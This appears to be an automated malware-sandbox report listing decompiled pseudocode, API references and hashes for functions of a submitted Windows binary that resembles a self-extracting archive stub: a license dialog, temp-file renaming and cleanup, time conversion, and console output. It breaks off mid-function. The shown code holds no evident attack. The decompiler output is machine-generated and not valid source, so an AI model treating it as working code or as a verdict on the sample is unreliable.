			E00BBAC20(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E00BA130B(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E00BBCBAE(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xbeb574;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xbf5b74;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xbfdc8c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xc010c0(0xf));
					 *0xc010bc(_t34);
					_t30 =  *0xbe745c; // 0x0
					E00BB95B5(_t30, __eflags,  *0xbdfed4, _t37,  *0xbfdc88, 0, 0);
					L00BC340E( *0xbfdc8c);
					L00BC340E( *0xbfdc88);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00bbac20
0x00bbac21
0x00bbac27
0x00bbac2e
0x00bbac47
0x00bbad33
0x00bbad35
0x00000000
0x00bbad35
0x00bbac4d
0x00bbac53
0x00bbac80
0x00bbac85
0x00bbac8a
0x00bbac8c
0x00bbac97
0x00bbac97
0x00bbac9d
0x00bbaca2
0x00bbaca4
0x00bbacb0
0x00bbacb0
0x00bbacb6
0x00bbacbb
0x00bbacbd
0x00bbacc1
0x00bbacc1
0x00bbacd6
0x00bbacde
0x00bbacf4
0x00bbacfb
0x00bbad01
0x00bbad16
0x00bbad21
0x00bbad2c
0x00000000
0x00bbad32
0x00bbac58
0x00bbac67
0x00000000
0x00bbac67
0x00bbac5d
0x00bbac60
0x00bbac7b
0x00bbac6f
0x00bbac70
0x00000000
0x00bbac70
0x00bbac65
0x00bbac6e
0x00000000
0x00bbac6e
0x00000000

APIs

Part of subcall function 00BA130B: GetDlgItem.USER32(00000000,00003021), ref: 00BA134F
Part of subcall function 00BA130B: SetWindowTextW.USER32(00000000,00BD25B4), ref: 00BA1365

EndDialog.USER32(?,00000001), ref: 00BBAC70
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BBAC97
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BBACB0
SetWindowTextW.USER32(?,?), ref: 00BBACC1
GetDlgItem.USER32(?,00000065), ref: 00BBACCA
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BBACDE
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BBACF4

Strings

LICENSEDLG, xrefs: 00BBAC34

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 38cef447c0c1f2b4a1bf38f2c258565442c68425b43f009b40dcbbdafcbf5818
Instruction ID: 8a2356890316eb75bae7f5489887bf7e121bbcf7e528821d1abf476402abad03
Opcode Fuzzy Hash: 38cef447c0c1f2b4a1bf38f2c258565442c68425b43f009b40dcbbdafcbf5818
Instruction Fuzzy Hash: B1212731604104BBE2215F25EE89FBF7FECEB46B45F054058FA41A35A0DBE2A941D632

Uniqueness

Uniqueness Score: -1.00%

Function 00BA93E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00BA93E0(void* __ecx) {
				void* __esi;
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E00BBE0E4(E00BD1CBC, _t84);
				E00BBE1C0();
				_t82 =  *(_t84 + 8);
				_t31 = _t84 - 0x4034;
				__imp__GetLongPathNameW(_t82, _t31, 0x800, _t76, _t81, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t82, _t84 - 0x5034, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t91 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E00BABBC5(_t91, _t84 - 0x4034);
							_t78 = E00BABBC5(_t91, _t84 - 0x5034);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00BB1708( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00BB1708(E00BABBC5(_t93, _t82), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t41;
										_t79 = 0;
										while(1) {
											_t95 = _t41;
											if(_t41 != 0) {
												break;
											}
											E00BAFD96(_t84 - 0x1010, _t82, 0x800);
											E00BA3FD6(E00BABBC5(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E00BAA0C0(_t84 - 0x1010) == 0) {
												_t41 =  *(_t84 - 0x1010);
											} else {
												_t41 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00BAFD96(_t84 - 0x3034, _t82, 0x800);
										_push(0x800);
										E00BABC3B(_t98, _t84 - 0x3034,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3034, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00BA95B6(_t84 - 0x2034);
											 *((intOrPtr*)(_t84 - 4)) = _t68;
											if(E00BAA0C0(_t82) == 0) {
												_push(0x12);
												_push(_t82);
												_t68 = E00BA96BE(_t84 - 0x2034);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3034);
											if(_t68 != 0) {
												E00BA9670(_t84 - 0x2034);
												E00BA97B7(_t84 - 0x2034, _t82);
											}
											E00BA95E8(_t84 - 0x2034, _t82);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t32;
			}

0x00ba93e5
0x00ba93ef
0x00ba93f6
0x00ba93f9
0x00ba9408
0x00ba9410
0x00ba95a1
0x00ba95a1
0x00ba95a1
0x00ba941e
0x00ba9427
0x00ba942f
0x00000000
0x00ba9435
0x00ba9435
0x00ba9437
0x00000000
0x00ba943d
0x00ba9449
0x00ba9458
0x00ba945a
0x00ba945f
0x00000000
0x00ba9465
0x00ba9469
0x00ba946e
0x00ba9470
0x00000000
0x00ba9476
0x00ba947e
0x00ba9485
0x00000000
0x00ba948b
0x00ba948b
0x00ba9492
0x00ba9494
0x00ba9494
0x00ba9497
0x00000000
0x00000000
0x00ba94a6
0x00ba94c3
0x00ba94c8
0x00ba94d9
0x00ba94e6
0x00ba94db
0x00ba94db
0x00ba94dd
0x00ba94dd
0x00ba94ed
0x00ba94f6
0x00000000
0x00ba94f8
0x00ba94f8
0x00ba94fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba94fb
0x00000000
0x00ba94f6
0x00ba950f
0x00ba9514
0x00ba951f
0x00ba953a
0x00000000
0x00ba953c
0x00ba9542
0x00ba9548
0x00ba9552
0x00ba9554
0x00ba9556
0x00ba9562
0x00ba9562
0x00ba9572
0x00ba957a
0x00ba9582
0x00ba958d
0x00ba958d
0x00ba9598
0x00ba959d
0x00ba959d
0x00ba953a
0x00ba9485
0x00ba9470
0x00ba945f
0x00ba9437
0x00ba942f
0x00ba95a3
0x00ba95a9
0x00ba95b3

APIs

__EH_prolog.LIBCMT ref: 00BA93E5
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BA9408
GetShortPathNameW.KERNEL32 ref: 00BA9427

Part of subcall function 00BB1708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,00BABA45,00000000,.exe,?,?,00000800,?,?,00BB854F,?), ref: 00BB171E

_swprintf.LIBCMT ref: 00BA94C3

Part of subcall function 00BA3FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA3FE9

MoveFileW.KERNEL32(?,?), ref: 00BA9532
MoveFileW.KERNEL32(?,?), ref: 00BA9572

Strings

rtmp%d, xrefs: 00BA94AC

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: ac5571f5c5fee503fc79f7ced1f749c9858c46929d7ae00a61c2d96dd40ef129
Instruction ID: 71e8d9520d6ab459d4a22bde46b0dc8c71d5788aedfe491052e7d6c9bc383fe9
Opcode Fuzzy Hash: ac5571f5c5fee503fc79f7ced1f749c9858c46929d7ae00a61c2d96dd40ef129
Instruction Fuzzy Hash: A6416371D052586ACF21EBA08D8AEEE73FCEF16381F0004E6B545E7142EB748B84DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BB09EA Relevance: 12.1, APIs: 8, Instructions: 115
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00BB09EA(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t91;
				signed int _t92;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E00BBE740( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E00BAAC35() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t91 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t92 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t91[3] = _v48.wHour & 0x0000ffff;
				_t91[4] = _v48.wMinute & 0x0000ffff;
				_t91[5] = _v48.wSecond & 0x0000ffff;
				_t91[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t91 = _v48.wYear & 0x0000ffff;
				_t91[1] = _t92;
				_t91[2] = _t85;
				_t91[8] = _t85 - 1;
				if(_t92 > 1) {
					_t89 = 0xbdd084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t91[8] = _t91[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t92) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t92 > 2 && E00BB0B57(_t88) != 0) {
					_t91[8] = _t91[8] + 1;
				}
				_t73 = E00BBE7B0( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t91[6] = _t73;
				return _t73;
			}

0x00bb09ea
0x00bb09f1
0x00bb0a02
0x00bb0a06
0x00bb0a14
0x00bb0a32
0x00bb0a43
0x00bb0a53
0x00bb0a63
0x00bb0a75
0x00bb0a7d
0x00bb0a83
0x00bb0a89
0x00bb0a8d
0x00bb0a8f
0x00bb0a16
0x00bb0a20
0x00bb0a20
0x00bb0a9d
0x00bb0aa3
0x00bb0aae
0x00bb0aaf
0x00bb0ab4
0x00bb0ab9
0x00bb0abe
0x00bb0ac6
0x00bb0ace
0x00bb0ad6
0x00bb0adc
0x00bb0ade
0x00bb0ae1
0x00bb0ae4
0x00bb0ae9
0x00bb0aed
0x00bb0af2
0x00bb0af3
0x00bb0afa
0x00bb0afd
0x00bb0b00
0x00bb0b03
0x00bb0b06
0x00000000
0x00000000
0x00000000
0x00bb0b06
0x00bb0b08
0x00bb0b08
0x00bb0b10
0x00bb0b1c
0x00bb0b1c
0x00bb0b2b
0x00bb0b31
0x00bb0b3a

APIs

__aulldiv.LIBCMT ref: 00BB09FD

Part of subcall function 00BAAC35: GetVersionExW.KERNEL32(?), ref: 00BAAC5A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00BB0A20
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00BB0A32
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BB0A43
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB0A53
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB0A63
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB0A9D
__aullrem.LIBCMT ref: 00BB0B2B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 7284005c34e370b487f744fab8fdb964fee20217514bbc452d1096a1c91f2bd7
Instruction ID: d8e9cde3b7e464663a95370617cbc2c5ccca64078fd20672cfabc245f6c288cf
Opcode Fuzzy Hash: 7284005c34e370b487f744fab8fdb964fee20217514bbc452d1096a1c91f2bd7
Instruction Fuzzy Hash: C3411AB25083069FC314EF65C8949BBF7F8FB88714F004A2EF69692250E775E548CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCEC6D Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00BCEC6D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xbdd668; // 0xb57946a0
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xc00290 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xc00290 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00BC9DA7(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xc00290 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xc00290 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xc00290 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00BC895A( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00BC895A();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00BBEA8A(_v8 ^ _t136);
			}

0x00bcec75
0x00bcec7c
0x00bcec7f
0x00bcec87
0x00bcec8b
0x00bcec97
0x00bcec9a
0x00bcec9d
0x00bceca4
0x00bcecac
0x00bcecaf
0x00bcecb5
0x00bcecbb
0x00bcecc0
0x00bcecc2
0x00bcecc5
0x00bcecca
0x00bcecd4
0x00bcecdb
0x00bcecde
0x00bcece5
0x00bcecec
0x00bced18
0x00bced3e
0x00bced40
0x00000000
0x00bced1a
0x00bced1d
0x00bcede4
0x00bcedf0
0x00bcedfb
0x00bcee00
0x00bced23
0x00bced2a
0x00bced2f
0x00bced35
0x00bced3b
0x00000000
0x00bced3b
0x00bced35
0x00bced1d
0x00bcecee
0x00bcecf2
0x00bcecf5
0x00bcecfb
0x00bcecfd
0x00bced00
0x00bced04
0x00bced41
0x00bced44
0x00bced45
0x00bced4a
0x00bced50
0x00bced56
0x00bced65
0x00bced6b
0x00bced71
0x00bced76
0x00bced92
0x00bcee05
0x00bcee0b
0x00bced94
0x00bced94
0x00bced9c
0x00bceda5
0x00bcedab
0x00000000
0x00bcedad
0x00bcedaf
0x00bcedb2
0x00bcedcb
0x00000000
0x00bcedcd
0x00bcedd1
0x00bcedd3
0x00bcedd6
0x00000000
0x00bcedd6
0x00bcedd1
0x00bcedcb
0x00bcedab
0x00bceda5
0x00bced92
0x00bced76
0x00bced50
0x00000000
0x00bcedd9
0x00bcedd9
0x00bcee0d
0x00bcee1f

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BCF3E2,00000000,00000000,00000000,00000000,00000000,00BC487F), ref: 00BCECAF
__fassign.LIBCMT ref: 00BCED2A
__fassign.LIBCMT ref: 00BCED45
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BCED6B
WriteFile.KERNEL32(?,00000000,00000000,00BCF3E2,00000000,?,?,?,?,?,?,?,?,?,00BCF3E2,00000000), ref: 00BCED8A
WriteFile.KERNEL32(?,00000000,00000001,00BCF3E2,00000000,?,?,?,?,?,?,?,?,?,00BCF3E2,00000000), ref: 00BCEDC3

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 25cd0368185144dbaf670a69c3beaccdae55ad4203326527c9274fc54a7e9dd8
Instruction ID: 988ee512f7430538cc982a91885fc6c89d2004e21459b559ed886b0a9f1c2625
Opcode Fuzzy Hash: 25cd0368185144dbaf670a69c3beaccdae55ad4203326527c9274fc54a7e9dd8
Instruction Fuzzy Hash: 3D519071A002499FCB14CFA8D885FEEBBF9EB08300F1545AAE565E7251E770E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC3AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00BBC3AB(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t259;
				signed int _t273;
				void* _t276;
				signed int _t277;
				void* _t281;

				L0:
				while(1) {
					L0:
					_t259 = __ebx;
					if(__ebx != 1) {
						goto L110;
					}
					L94:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E00BAB147(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L96:
						_push( *0xbdd5f8);
						__ebp - 0x7c84 = E00BA3FD6(0xbe846a, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00BAA0C0(0xbe846a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L95:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L97:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xbe846a);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L162:
							_push(0x1000);
							_t195 = _t281 - 0xe; // 0xffffa36e
							_t196 = _t281 - 0xd; // 0xffffa36f
							_t197 = _t281 - 0x5c84; // 0xffff46f8
							_t198 = _t281 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t281 + 0xc)));
							_t207 = E00BBA986();
							_t259 =  *((intOrPtr*)(_t281 + 0x10));
							 *((intOrPtr*)(_t281 + 0xc)) = _t207;
							if(_t207 != 0) {
								_t208 = _t281 - 0x5c84;
								_t276 = _t281 - 0x1bc8c;
								_t273 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00BB1708(_t281 - 0xfc8c,  *((intOrPtr*)(0xbdd618 + _t277 * 4))) != 0) {
								_t277 = _t277 + 1;
								if(_t277 < 0xe) {
									continue;
								} else {
									goto L162;
								}
							}
							__eflags = _t277 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t277 * 4 +  &M00BBC929))) {
								case 0:
									L9:
									__eflags = _t259 - 2;
									if(_t259 == 2) {
										E00BB9D58(_t281 - 0x7c84, 0x800);
										E00BAA3DD(E00BAB8A5(_t281 - 0x7c84, _t281 - 0x5c84, _t281 - 0xdc8c, 0x800), _t259, _t281 - 0x8c8c, _t277);
										 *(_t281 - 4) = 0;
										E00BAA517(_t281 - 0x8c8c, _t281 - 0xdc8c);
										E00BA7098(_t281 - 0x3c84);
										while(1) {
											L23:
											_push(0);
											_t267 = _t281 - 0x8c8c;
											_t222 = E00BAA46A(_t281 - 0x8c8c, _t272, _t281 - 0x3c84);
											__eflags = _t222;
											if(_t222 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t281 - 0x3c84, 0);
											__eflags =  *(_t281 - 0x2c78);
											if(__eflags == 0) {
												L16:
												_t226 = GetFileAttributesW(_t281 - 0x3c84);
												__eflags = _t226 - 0xffffffff;
												if(_t226 == 0xffffffff) {
													continue;
												}
												L17:
												_t228 = DeleteFileW(_t281 - 0x3c84);
												__eflags = _t228;
												if(_t228 != 0) {
													continue;
												} else {
													_t279 = 0;
													_push(0);
													goto L20;
													L20:
													E00BA3FD6(_t281 - 0x103c, 0x800, L"%s.%d.tmp", _t281 - 0x3c84);
													_t283 = _t283 + 0x14;
													_t233 = GetFileAttributesW(_t281 - 0x103c);
													__eflags = _t233 - 0xffffffff;
													if(_t233 != 0xffffffff) {
														_t279 = _t279 + 1;
														__eflags = _t279;
														_push(_t279);
														goto L20;
													} else {
														_t236 = MoveFileW(_t281 - 0x3c84, _t281 - 0x103c);
														__eflags = _t236;
														if(_t236 != 0) {
															MoveFileExW(_t281 - 0x103c, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E00BAB437(_t267, __eflags, _t281 - 0x7c84, _t281 - 0x103c, 0x800);
											E00BAB147(__eflags, _t281 - 0x103c, 0x800);
											_t280 = E00BC33F3(_t281 - 0x7c84);
											__eflags = _t280 - 4;
											if(_t280 < 4) {
												L14:
